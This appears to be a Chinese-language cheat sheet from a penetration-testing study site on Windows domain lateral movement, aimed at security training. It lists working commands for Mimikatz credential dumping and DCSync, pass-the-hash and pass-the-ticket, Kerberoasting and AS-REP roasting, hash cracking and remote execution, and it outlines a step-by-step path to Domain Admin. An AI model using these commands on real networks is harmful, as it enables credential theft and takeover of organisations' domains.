Skip to content

横向移动笔记

拿到一台机器后,在内网扩大战果的技术集合。

🔍 内网信息收集

主机与网段发现

bash
# 本机信息
ipconfig /all           # Windows
ip a; ip route          # Linux

# 活跃主机
nmap -sn 10.10.10.0/24
arp -a

# 从被控机做端口扫描(通过代理)
proxychains nmap -sT -Pn -n <>

Windows 域信息

bash
# 域/用户/组
net user /domain
net group "Domain Admins" /domain
whoami /all

# BloodHound 数据收集
# Linux
bloodhound-python -u user -p pass -d domain.local -ns <DC> -c All

# Windows
SharpHound.exe -c All

🔑 凭据抓取与传递

凭据抓取

powershell
# Mimikatz
privilege::debug
sekurlsa::logonpasswords
lsadump::sam
lsadump::dcsync /user:krbtgt

# 安全上下文
rubeus.exe triage
rubeus.exe dump

Pass-the-Hash / Pass-the-Ticket

bash
# PTH - Impacket
impacket-psexec domain/user@$IP -hashes :<NTLM>
impacket-wmiexec domain/user@$IP -hashes :<NTLM>

# PTH - CrackMapExec
crackmapexec smb $IP -u user -H <NTLM>

# PTT - Rubeus
Rubeus.exe ptt /ticket:<base64>

🎫 Kerberos 攻击

攻击前提典型工具
Kerberoasting拥有任意域账号Rubeus / impacket-GetUserSPNs
AS-REP Roasting目标账号禁用预认证impacket-GetNPUsers
Unconstrained Delegation控制配置了非约束委派的机器Rubeus monitor
Constrained Delegation控制配置了约束委派的账号Rubeus s4u
Golden Ticket拿到 krbtgt hashmimikatz / Rubeus
Silver Ticket拿到服务账号 hashmimikatz / Rubeus
bash
# Kerberoasting
impacket-GetUserSPNs domain/user:pass -dc-ip <DC> -request

# AS-REP Roasting
impacket-GetNPUsers domain/ -usersfile users.txt -dc-ip <DC>

# 破解
hashcat -m 13100 kerberoast.hash rockyou.txt  # TGS
hashcat -m 18200 asrep.hash rockyou.txt        # AS-REP

🚚 远程执行

bash
# SMB
impacket-psexec / smbexec / wmiexec
crackmapexec smb $IP -u user -p pass -x "whoami"

# WinRM
evil-winrm -i $IP -u user -p pass

# RDP
xfreerdp /u:user /p:pass /v:$IP /dynamic-resolution

🌉 隧道与代理

详见 网络攻防 笔记中的隧道部分:Chisel / Ligolo-ng / SSH 动态转发 / socks。

📋 标准流程

  1. 当前主机信息收集(用户/组/进程/网络)
  2. 抓取本机凭据与令牌
  3. 扫描网段、识别域控/文件服务器等高价值目标
  4. BloodHound 画图找最短攻击路径
  5. 用凭据/票据移动 → 扩大控制面
  6. 逐步逼近 DA / Enterprise Admin

🔗 参考资源


持续更新中...

公众号

关注「极客零零七」

每周实战攻防干货 · HTB Writeup · 独家速查资料

  • 回复 提权 → Windows+Linux 提权速查 PDF
  • 回复 AD攻击 → AD 域渗透攻击手册
  • 回复 靶机 → HTB 靶机推荐清单
  • 回复 OSCP → OSCP 备考完整路线图
极客零零七 公众号二维码

扫码关注

⚠️ 内容仅供学习交流使用 | 本站访问量